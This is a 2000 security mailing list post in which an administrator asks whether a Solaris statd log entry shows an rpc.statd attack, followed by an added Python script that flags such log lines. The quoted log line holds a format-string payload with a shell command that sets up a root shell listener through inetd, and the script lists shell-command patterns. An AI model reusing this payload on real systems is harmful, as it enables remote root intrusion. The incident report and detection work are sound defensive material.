Security Incidents mailing list archives
A statd exploit?
From: Randy Nethers <rnethers () MAIL GEOTOUCH COM>
Date: Tue, 15 Aug 2000 12:35:00 -0700
Yesterday, a friend of mine from a local university asked me to take a look at a machine (an Ultra 2 w/Solaris 2.6) which had rebooted itself yesterday morning (Aug 14th) for no apparent reason. After poking around, I could find nothing of interest, except two things. First I found in /var/adm/messages.0 the following line:

Aug 12 00:58:07 ultra2 statd[178]: statd: attempt to create "/var/statmon/sm/%0 8x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %0242x%n%055 x%n%012x%n%0192x%nK^v ^( ^ ^. #^1 F'F* FF+, NV1@/bin/sh -c echo "9088 stream tc p nowait root /bin/sh -i" >> /tmp/m; /usr/sbin/inetd /tmp/m;"

Also, this single entry in the messages file is the only message in any of the log files from Aug 12, which I find strange. (There are lots of messages in /var/log/syslog from the Saturday before, but none for Aug 12, for instance regarding emails going to and from the machine.)

The reboot occurred at about 9:30 am, just before people at the office where the machine is located started using it. The machine has Oracle on it.

I was wondering if this might have anything to do with the rpc.statd exploit discussed earlier on this list where a user found a file called /tmp/bob. I looked, but obviously, with the machine having been rebooted, there would be nothing in /tmp.

Anybody have any ideas?

Thanks,
Randy Nethers
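
Added example, not part of the original post: a small log check for statd "attempt to create" messages like the one quoted above, flagging file names that carry printf conversions, a %n, or shell command text. The sample lines are constructed (the third is a shortened form of the quoted entry), and the threshold of four conversions is an assumption.

```python
import re

# Message format taken from the /var/adm/messages.0 line quoted in the post.
STATD_RE = re.compile(r'statd\[\d+\]: statd: attempt to create "(?P<path>.*)$')
# printf-style conversion: flags, width, precision, length modifier, conversion.
FMT_RE = re.compile(r'%[-+ #0]*\d*(?:\.\d+)?(?:hh|h|ll|l)?([diouxXsnp])')
# Strings that have no business in a monitored host's file name.
SHELL_HINTS = ("/bin/sh", "inetd", ">>")
MIN_CONVERSIONS = 4  # assumed threshold; tune for your environment

# Constructed sample input (not copied from a real system).
SAMPLE_LOG = [
    'Aug 11 23:10:02 ultra2 sendmail[412]: constructed unrelated line',
    'Aug 12 00:58:07 ultra2 statd[178]: statd: attempt to create '
    '"/var/statmon/sm/../host"',
    'Aug 12 00:58:07 ultra2 statd[178]: statd: attempt to create '
    '"/var/statmon/sm/%08x %08x %08x %0242x%n%055x%n /bin/sh -c echo ..."',
]

def inspect_line(line):
    """Return None for non-statd lines, else a list of reasons (may be empty)."""
    m = STATD_RE.search(line)
    if not m:
        return None
    path = m.group("path")
    convs = [c.group(1) for c in FMT_RE.finditer(path)]
    reasons = []
    if "n" in convs:
        reasons.append("%n write conversion in file name")
    if len(convs) >= MIN_CONVERSIONS:
        reasons.append(f"{len(convs)} printf conversions in file name")
    if any(hint in path for hint in SHELL_HINTS):
        reasons.append("shell command text in file name")
    return reasons

def scan(lines):
    """Return (line_number, reasons) for every statd line with findings."""
    return [(i, r) for i, line in enumerate(lines, 1) if (r := inspect_line(line))]

if __name__ == "__main__":
    for lineno, reasons in scan(SAMPLE_LOG):
        print(f"line {lineno}: " + "; ".join(reasons))
```

A hit here only shows that a request with such a file name reached statd; whether it succeeded has to be established from the host itself.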